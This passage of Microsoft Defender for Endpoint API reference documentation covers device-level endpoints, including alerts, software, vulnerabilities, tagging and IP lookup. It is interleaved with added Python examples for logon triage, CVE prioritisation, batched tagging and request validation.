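The following is an added example, not part of the Microsoft documentation and not Microsoft's own client code. It builds the logonusers request for a device, maps the documented 200/404 outcomes, and then triages the user list for the case a responder cares about most: domain admins that have logged on interactively (and so have left reusable credential material on the box), as opposed to admins that only ever touched the device over a network logon. The function names, the assumption that logonTypes is a comma-separated string such as "Interactive, RemoteInteractive", and the sample response are all this example's own.

```python
"""Added example (not from the Microsoft documentation): build the
logonusers request for a device and triage the response for privileged
interactive logons. The response at the bottom is constructed sample data."""
from __future__ import annotations

from urllib.parse import quote

API_BASE = "https://api.securitycenter.microsoft.com/api"  # documented base URL

# Logon types that leave reusable credential material on the device. Assumption
# of this example: logonTypes is a comma-separated string like
# "Interactive, RemoteInteractive", as in the documented "Interactive" sample.
CREDENTIAL_EXPOSING_LOGONS = {"Interactive", "RemoteInteractive"}


def logon_users_request(machine_id: str, token: str) -> tuple[str, dict]:
    """Return (url, headers) for GET /api/machines/{id}/logonusers."""
    url = f"{API_BASE}/machines/{quote(machine_id, safe='')}/logonusers"
    return url, {"Authorization": f"Bearer {token}"}


def parse_logon_users(status: int, body: dict) -> list[dict]:
    """Map the documented status codes: 200 -> user list, 404 -> no such device."""
    if status == 404:
        raise LookupError("device not found")
    if status != 200:
        raise RuntimeError(f"unexpected status {status}")
    return list(body.get("value", []))


def privileged_interactive_logons(users: list[dict]) -> list[str]:
    """Return IDs of domain admins whose logon types include an interactive logon.

    Admins that only appear with a Network logon (isOnlyNetworkUser) did not
    leave cached credentials behind; interactive admins are the ones an
    attacker with code execution on the device could harvest."""
    hits = []
    for user in users:
        types = {t.strip() for t in user.get("logonTypes", "").split(",")}
        if user.get("isDomainAdmin") and types & CREDENTIAL_EXPOSING_LOGONS:
            hits.append(user["id"])
    return hits


# Constructed sample response shaped like the documented one.
SAMPLE_RESPONSE = {
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Users",
    "value": [
        {"id": "contoso\\user1", "accountName": "user1", "accountDomain": "contoso",
         "logonTypes": "Interactive", "isDomainAdmin": True, "isOnlyNetworkUser": False},
        {"id": "contoso\\svc-backup", "accountName": "svc-backup", "accountDomain": "contoso",
         "logonTypes": "Network", "isDomainAdmin": True, "isOnlyNetworkUser": True},
        {"id": "contoso\\user2", "accountName": "user2", "accountDomain": "contoso",
         "logonTypes": "Interactive, RemoteInteractive", "isDomainAdmin": False,
         "isOnlyNetworkUser": False},
    ],
}

if __name__ == "__main__":
    url, _ = logon_users_request("1e5bc9d7e413ddd7902c2932e418702b84d0cc07", "<token>")
    print(url)
    print(privileged_interactive_logons(parse_logon_users(200, SAMPLE_RESPONSE)))
```

Only contoso\user1 is reported: svc-backup is a domain admin but only ever used a Network logon, and user2 logged on interactively but is not privileged. When calling the live service with a delegated token, remember the note above: users on devices outside your device groups are simply absent from the response, not flagged.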



Get machine related alerts API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves all Alerts related to a specific device.

Limitations
1. You can query on devices last updated according to your configured retention
period.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Alert.Read.All | 'Read all alerts'
Application | Alert.ReadWrite.All | 'Read and write all alerts'
Delegated (work or school account) | Alert.Read | 'Read alerts'
Delegated (work or school account) | Alert.ReadWrite | 'Read and write alerts'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data'. For more information about permissions, see Create and manage roles.
- The user needs to have access to the device, based on device group settings. For more information about device group settings, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/machines/{id}/alerts

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and device exists: 200 OK with list of alert entities in the body. If device was not found: 404 Not Found.



Get installed software
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Retrieves a collection of installed software related to a given device ID.


Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'
Delegated (work or school account) | Software.Read | 'Read Threat and Vulnerability Management Software information'

HTTP request
HTTP

GET /api/machines/{machineId}/software

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the installed software information in the
body.

Example
Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf44207c4006ed7cc4501/software

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Software",
    "value": [
        {
            "id": "microsoft-_-internet_explorer",
            "name": "internet_explorer",
            "vendor": "microsoft",
            "weaknesses": 67,
            "publicExploit": true,
            "activeAlert": false,
            "exposedMachines": 42115,
            "impactScore": 46.2037163
        }
    ]
}

See also
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory



Get discovered vulnerabilities
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Retrieves a collection of discovered vulnerabilities related to a given device ID.

Limitations
1. Rate limitations for this API are 50 calls per minute and 1500 calls per hour.
Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Vulnerability.Read.All | 'Read Threat and Vulnerability Management vulnerability information'
Delegated (work or school account) | Vulnerability.Read | 'Read Threat and Vulnerability Management vulnerability information'

HTTP request
HTTP

GET /api/machines/{machineId}/vulnerabilities

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the discovered vulnerability information in
the body.

Example
Request
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf44207c4006ed7cc4501/vulnerabilities

Response
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(Analytics.Contracts.PublicAPI.PublicVulnerabilityDto)",
    "value": [
        {
            "id": "CVE-2019-1348",
            "name": "CVE-2019-1348",
            "description": "Git could allow a remote attacker to bypass security restrictions, caused by a flaw in the --export-marks option of git fast-import. By persuading a victim to import specially-crafted content, an attacker could exploit this vulnerability to overwrite arbitrary paths.",
            "severity": "Medium",
            "cvssV3": 4.3,
            "exposedMachines": 1,
            "publishedOn": "2019-12-13T00:00:00Z",
            "updatedOn": "2019-12-13T00:00:00Z",
            "publicExploit": false,
            "exploitVerified": false,
            "exploitInKit": false,
            "exploitTypes": [],
            "exploitUris": []
        }
    ]
}
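The following is an added example, not part of the Microsoft documentation and not Microsoft's own code. It serves both the installed-software API above and this discovered-vulnerabilities API: it takes the two responses for one device and turns them into a triage order, using the documented exploit flags (exploitInKit, exploitVerified, publicExploit) ahead of the raw CVSS score, since a medium-scored CVE with public exploit code is usually more urgent than a high-scored one nobody has weaponised. The tier cut-offs are this example's own policy, and the sample data is constructed (the CVE-EXAMPLE-* identifiers are placeholders; only CVE-2019-1348 and the internet_explorer entry mirror the documented examples).

```python
"""Added example (not from the Microsoft documentation): combine one device's
/software and /vulnerabilities responses into a triage order. The tier
cut-offs are this example's own policy and the sample data is constructed."""
from __future__ import annotations


def vulnerability_tier(vuln: dict) -> int:
    """Tier 1 acts first. The exploit flags are documented response fields;
    the CVSS cut-offs (9.0 and 7.0) are an assumed policy, not API semantics."""
    cvss = float(vuln.get("cvssV3") or 0.0)
    if vuln.get("exploitInKit") or vuln.get("exploitVerified"):
        return 1  # weaponised: an exploit is verified or ships in a kit
    if vuln.get("publicExploit") or cvss >= 9.0:
        return 2  # public exploit code exists, or critical by score
    if cvss >= 7.0:
        return 3  # high severity, no known exploit yet
    return 4


def exploitable_software(software_response: dict) -> list[str]:
    """IDs of installed products the service flags with publicExploit."""
    return sorted(s["id"] for s in software_response.get("value", [])
                  if s.get("publicExploit"))


def device_report(vuln_response: dict, software_response: dict) -> dict:
    """Rank a device's CVEs by tier, then CVSS descending, then ID (for a
    stable order), and list installed software that already has a public exploit."""
    rows = [
        {"cve": v["id"], "tier": vulnerability_tier(v),
         "cvss": float(v.get("cvssV3") or 0.0), "severity": v.get("severity")}
        for v in vuln_response.get("value", [])
    ]
    rows.sort(key=lambda r: (r["tier"], -r["cvss"], r["cve"]))
    return {"exploitable_software": exploitable_software(software_response),
            "vulnerabilities": rows}


# Constructed sample data; CVE-EXAMPLE-* are placeholder identifiers.
SAMPLE_VULNS = {"value": [
    {"id": "CVE-2019-1348", "severity": "Medium", "cvssV3": 4.3,
     "publicExploit": False, "exploitVerified": False, "exploitInKit": False},
    {"id": "CVE-EXAMPLE-0001", "severity": "Critical", "cvssV3": 9.8,
     "publicExploit": True, "exploitVerified": True, "exploitInKit": False},
    {"id": "CVE-EXAMPLE-0002", "severity": "High", "cvssV3": 7.5,
     "publicExploit": False, "exploitVerified": False, "exploitInKit": False},
    {"id": "CVE-EXAMPLE-0003", "severity": "Medium", "cvssV3": 6.5,
     "publicExploit": True, "exploitVerified": False, "exploitInKit": False},
]}
SAMPLE_SOFTWARE = {"value": [
    {"id": "microsoft-_-internet_explorer", "publicExploit": True},
    {"id": "contoso-_-agent", "publicExploit": False},
]}

if __name__ == "__main__":
    for row in device_report(SAMPLE_VULNS, SAMPLE_SOFTWARE)["vulnerabilities"]:
        print(f"tier {row['tier']}  {row['cve']:18}  cvss {row['cvss']}")
```

Note the ordering the policy produces: CVE-EXAMPLE-0003 (CVSS 6.5, public exploit) ranks above CVE-EXAMPLE-0002 (CVSS 7.5, no exploit). Also keep the documented limit in mind when running this across a fleet: the vulnerabilities endpoint allows 50 calls per minute, so iterate devices with pacing rather than in a tight loop.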

See also
Microsoft Defender Vulnerability Management
Vulnerabilities in your organization


Get security recommendations
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management

Want to experience Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Important

Some information in this article relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.

Retrieves a collection of security recommendations related to a given device ID.


Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | SecurityRecommendation.Read.All | 'Read Threat and Vulnerability Management security recommendation information'
Delegated (work or school account) | SecurityRecommendation.Read | 'Read Threat and Vulnerability Management security recommendation information'

HTTP request
HTTP

GET /api/machines/{machineId}/recommendations

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK with the security recommendations in the
body.
Example

Request example
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/ac233fa6208e1579620bf44207c4006ed7cc4501/recommendations

Response example
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Recommendations",
    "value": [
        {
            "id": "va-_-git-scm-_-git",
            "productName": "git",
            "recommendationName": "Update Git to version 2.24.1.2",
            "weaknesses": 3,
            "vendor": "git-scm",
            "recommendedVersion": "2.24.1.2",
            "recommendationCategory": "Application",
            "subCategory": "",
            "severityScore": 0,
            "publicExploit": false,
            "activeAlert": false,
            "associatedThreats": [],
            "remediationType": "Update",
            "status": "Active",
            "configScoreImpact": 0,
            "exposureImpact": 0,
            "totalMachineCount": 0,
            "exposedMachinesCount": 1,
            "nonProductivityImpactedAssets": 0,
            "relatedComponent": "Git"
        },
        ...
    ]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management security recommendation



Add or remove a tag for a machine
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Adds or removes a tag for a specific Machine.

Limitations
1. You can post on machines last seen according to your configured retention period.

2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Manage security setting'. For more information, see Create and manage roles.
- The user needs to have access to the machine, based on machine group settings. For more information, see Create and manage machine groups.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/{id}/tags

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
Value | String | The tag name. Required.
Action | Enum | Add or Remove. Allowed values are: 'Add' or 'Remove'. Required.

Response
If successful, this method returns 200 - Ok response code and the updated Machine in
the response body.

Example Request
Here is an example of a request that adds a machine tag.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/tags

JSON

{
    "Value": "test Tag 2",
    "Action": "Add"
}

To remove machine tag, set the Action to 'Remove' instead of 'Add' in the request body.

Add or remove a tag for multiple machines
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Adds or removes a tag for the specified set of machines.

Limitations
1. You can post on machines last seen according to your configured retention period.
2. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
3. We can add or remove a tag for up to 500 machines per API call.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'Manage security setting'. For more information, see Create and manage roles.
- The user needs to have access to the machine, based on machine group settings. For more information, see Create and manage machine groups.

HTTP request
HTTP

POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMultipleMachines

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.
Content-Type | String | application/json. Required.

Request body
In the request body, supply a JSON object with the following parameters:

Parameter | Type | Description
Value | String | The tag name. Required.
Action | Enum | Add or Remove. Allowed values are: 'Add' or 'Remove'. Required.
MachineIds | List (String) | List of machine IDs to update. Required.

Response
If successful, this method returns 200 - Ok response code and the updated machines in
the response body.

Example Request
Here's an example of a request that adds a tag to multiple machines.

HTTP

POST https://api.securitycenter.microsoft.com/api/machines/AddOrRemoveTagForMultipleMachines

JSON

{
    "Value": "Tag",
    "Action": "Add",
    "MachineIds": [
        "34e83ca3feea4dae2353006ba389262c033a025e",
        "2a398439b4975924e87a65943972bc702469b329",
        "a610c00c65fdf79960cc0077d9d8c569d23f09a5"
    ]
}

To remove machine tags, set the Action to 'Remove' instead of 'Add' in the request
body.
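The following is an added example, not part of the Microsoft documentation and not Microsoft's own client code. It shows the practical side of the limits listed above: a fleet-wide tag change is split into batches of at most 500 machine IDs per call, the Action and Value fields are validated before anything is sent, duplicate IDs are dropped, and a non-200 response for any batch stops the run so a partial failure is visible. The transport is injected as a `send(url, headers, body)` callable; the `fake_send` at the bottom is a stand-in that echoes the batch back, so the block runs offline. Function names and the fake's response shape are this example's own.

```python
"""Added example (not from the Microsoft documentation): add or remove a tag
across many devices with AddOrRemoveTagForMultipleMachines, split into the
documented maximum of 500 machine IDs per call. The HTTP layer is injected;
the fake_send at the bottom is a stand-in, not the real service."""
from __future__ import annotations

from typing import Callable, Iterable

API_BASE = "https://api.securitycenter.microsoft.com/api"  # documented base URL
BULK_TAG_URL = f"{API_BASE}/machines/AddOrRemoveTagForMultipleMachines"
MAX_IDS_PER_CALL = 500  # documented limit per call
ALLOWED_ACTIONS = {"Add", "Remove"}  # documented enum values


def tag_request_bodies(machine_ids: Iterable[str], value: str, action: str) -> list[dict]:
    """Validate the inputs and return one request body per batch of <= 500 IDs.

    Duplicate IDs are dropped (first occurrence wins) so no batch repeats a device."""
    if action not in ALLOWED_ACTIONS:
        raise ValueError(f"Action must be one of {sorted(ALLOWED_ACTIONS)}, got {action!r}")
    if not value or not value.strip():
        raise ValueError("tag Value must be a non-empty string")
    unique = list(dict.fromkeys(machine_ids))  # dedupe while keeping order
    return [
        {"Value": value, "Action": action, "MachineIds": unique[i:i + MAX_IDS_PER_CALL]}
        for i in range(0, len(unique), MAX_IDS_PER_CALL)
    ]


def apply_tag(machine_ids: Iterable[str], value: str, action: str, token: str,
              send: Callable[[str, dict, dict], tuple[int, dict]]) -> list[dict]:
    """POST each batch through `send(url, headers, body)`, which returns
    (status, json). Stops at the first non-200 so a partial failure is not silent."""
    headers = {"Authorization": f"Bearer {token}", "Content-Type": "application/json"}
    results = []
    for body in tag_request_bodies(machine_ids, value, action):
        status, payload = send(BULK_TAG_URL, headers, body)
        if status != 200:
            raise RuntimeError(f"batch of {len(body['MachineIds'])} IDs failed with HTTP {status}")
        results.append(payload)
    return results


def fake_send(url: str, headers: dict, body: dict) -> tuple[int, dict]:
    """Stand-in transport (constructed): echoes the batch back as a 200 would.
    Replace with a real HTTP call when running against the service."""
    assert url == BULK_TAG_URL and headers["Content-Type"] == "application/json"
    machines = [{"id": mid, "machineTags": [body["Value"]]} for mid in body["MachineIds"]]
    return 200, {"value": machines}


if __name__ == "__main__":
    ids = [f"{i:040x}" for i in range(1200)]  # constructed 40-hex-char device IDs
    for payload in apply_tag(ids, "Tag", "Add", "<token>", fake_send):
        print(f"batch tagged {len(payload['value'])} machines")
```

With 1,200 devices this makes three calls (500, 500, 200). Combined with the documented rate limit of 100 calls per minute, a single client can therefore retag up to 50,000 devices per minute before it needs to pace itself.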



Find devices by internal IP API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Find Machines seen with the requested internal IP in the time range of 15 minutes prior
and after a given timestamp.

Limitations
1. The given timestamp must be in the past 30 days.
2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data'. For more information, see Create and manage roles.
- The response will include only devices that the user has access to, based on device group settings. For more information, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/machines/findbyip(ip='{IP}',timestamp={TimeStamp})

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful - 200 OK with list of the machines in the response body. If the timestamp isn't in the past 30 days - 400 Bad Request.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/findbyip(ip='10.248.240.38',timestamp=2019-09-22T08:44:05Z)
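The following is an added example, not part of the Microsoft documentation and not Microsoft's own client code. It builds the findbyip URL in the OData function-call form shown above (IP quoted, timestamp bare, always UTC with a trailing Z) and enforces the documented 30-day window on the client so a stale timestamp fails locally instead of round-tripping to a 400. The IP is validated as an address before it is spliced into the query, which also keeps a caller-supplied string from altering the OData expression. Function names, the choice to reject future timestamps, and the sample values are this example's own; the IP and timestamp reuse the documented request.

```python
"""Added example (not from the Microsoft documentation): build the findbyip
request and enforce the documented 30-day window client-side."""
from __future__ import annotations

import ipaddress
from datetime import datetime, timedelta, timezone
from typing import Optional

API_BASE = "https://api.securitycenter.microsoft.com/api"  # documented base URL
LOOKBACK = timedelta(days=30)  # documented limit on the timestamp


def find_by_ip_url(ip: str, timestamp: datetime, now: Optional[datetime] = None) -> str:
    """Return the GET URL for machines seen with `ip` around `timestamp`.

    The OData syntax quotes the IP and leaves the timestamp bare. The IP is
    validated as an address so nothing else can be spliced into the expression.
    Future timestamps are rejected too (assumption: they are not "in the past
    30 days" either)."""
    ipaddress.ip_address(ip)  # raises ValueError for anything that is not an IP
    if timestamp.tzinfo is None:
        raise ValueError("timestamp must be timezone-aware")
    ts = timestamp.astimezone(timezone.utc)
    now = (now or datetime.now(timezone.utc)).astimezone(timezone.utc)
    if ts < now - LOOKBACK or ts > now:
        raise ValueError(f"timestamp must be within the past 30 days (got {ts.isoformat()})")
    stamp = ts.strftime("%Y-%m-%dT%H:%M:%SZ")  # second precision, explicit UTC
    return f"{API_BASE}/machines/findbyip(ip='{ip}',timestamp={stamp})"


def machine_ids_from_response(status: int, body: dict) -> list[str]:
    """200 -> list of machine IDs. 400 is what the service returns for a
    timestamp outside the window, so it is surfaced distinctly."""
    if status == 400:
        raise ValueError("service rejected the timestamp (not in the past 30 days)")
    if status != 200:
        raise RuntimeError(f"unexpected status {status}")
    return [m["id"] for m in body.get("value", [])]


if __name__ == "__main__":
    seen = datetime(2019, 9, 22, 8, 44, 5, tzinfo=timezone.utc)  # documented sample time
    print(find_by_ip_url("10.248.240.38", seen, now=seen + timedelta(days=1)))
```

Because the service only matches devices seen with the IP in a 15-minute window either side of the timestamp, pass the time of the event you are investigating (for example the timestamp on the firewall or proxy log line), not the time you run the query.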



Find device information by internal IP API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Find a device by internal IP.

Note

The timestamp must be within the last 30 days.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'

HTTP request
HTTP

GET /api/machines/find(timestamp={time},key={IP})

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful and machine exists - 200 OK. If no machine found - 404 Not Found.

Example

Request example
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/find(timestamp=2018-06-19T10:00:00Z,key='10.166.93.61')

Response example
Here's an example of the response.

The response will return a list of all devices that reported this IP address within 16
minutes prior and after the timestamp.

HTTP

HTTP/1.1 200 OK
Content-type: application/json
{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Machines",
    "value": [
        {
            "id": "04c99d46599f078f1c3da3783cf5b95f01ac61bb",
            "computerDnsName": "",
            "firstSeen": "2017-07-06T01:25:04.9480498Z",
            "osPlatform": "Windows10",
            ...
        }
    ]
}



Find devices by tag API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

API description
Find Machines by Tag.

startswith query is supported.

Limitations
1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.

Permissions
One of the following permissions is required to call this API. To learn more, including
how to choose permissions, see Use Microsoft Defender for Endpoint APIs

Permission type | Permission | Permission display name
Application | Machine.Read.All | 'Read all machine profiles'
Application | Machine.ReadWrite.All | 'Read and write all machine information'
Delegated (work or school account) | Machine.Read | 'Read machine information'
Delegated (work or school account) | Machine.ReadWrite | 'Read and write machine information'

Note

When obtaining a token using user credentials:

- The user needs to have at least the following role permission: 'View Data'. For more information, see Create and manage roles.
- The response will include only devices that the user has access to, based on device group settings. For more information, see Create and manage device groups.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.

HTTP request
HTTP

GET /api/machines/findbytag?tag={tag}&useStartsWithFilter={true/false}

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request URI parameters

Name | Type | Description
tag | String | The tag name. Required.
useStartsWithFilter | Boolean | When set to true, the search finds all devices with a tag name that starts with the given tag in the query. Defaults to false. Optional.

Request body
Empty

Response
If successful - 200 OK with list of the machines in the response body.

Example

Request
Here's an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/findbytag?tag=testTag&useStartsWithFilter=true



Get missing KBs by device ID
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender Vulnerability Management

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the Microsoft Defender Vulnerability Management public preview trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

api-us.securitycenter.microsoft.com
api-eu.securitycenter.microsoft.com
api-uk.securitycenter.microsoft.com
api-au.securitycenter.microsoft.com

Retrieves missing KBs (security updates) by device ID

HTTP request
HTTP

GET /api/machines/{machineId}/getmissingkbs

Permissions
The following permission is required to call this API. To learn more, including how to choose permissions, see Use Microsoft Defender for Endpoint APIs.

Permission type | Permission | Permission display name
Application | Software.Read.All | 'Read Threat and Vulnerability Management Software information'

Request headers

Name | Type | Description
Authorization | String | Bearer {token}. Required.

Request body
Empty

Response
If successful, this method returns 200 OK, with the specified device missing kb data in
the body.

Example

Request
Here is an example of the request.

HTTP

GET https://api.securitycenter.microsoft.com/api/machines/2339ad14a01bd0299afb93dfa2550136057bff96/getmissingkbs

Response
Here is an example of the response.

JSON

{
    "@odata.context": "https://api.securitycenter.microsoft.com/api/$metadata#Collection(microsoft.windowsDefenderATP.api.PublicProductFixDto)",
    "value": [
        {
            "id": "4540673",
            "name": "March 2020 Security Updates",
            "productsNames": [
                "windows_10",
                "edge",
                "internet_explorer"
            ],
            "url": "https://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4540673",
            "machineMissedOn": 1,
            "cveAddressed": 97
        }
    ]
}

Related topics
Microsoft Defender Vulnerability Management
Defender Vulnerability Management software inventory

Set device value API
Article • 09/27/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Note

If you are a US Government customer, please use the URIs listed in Microsoft Defender for Endpoint for US Government customers.

Tip

For better performance, you can use a server closer to your geographic location:

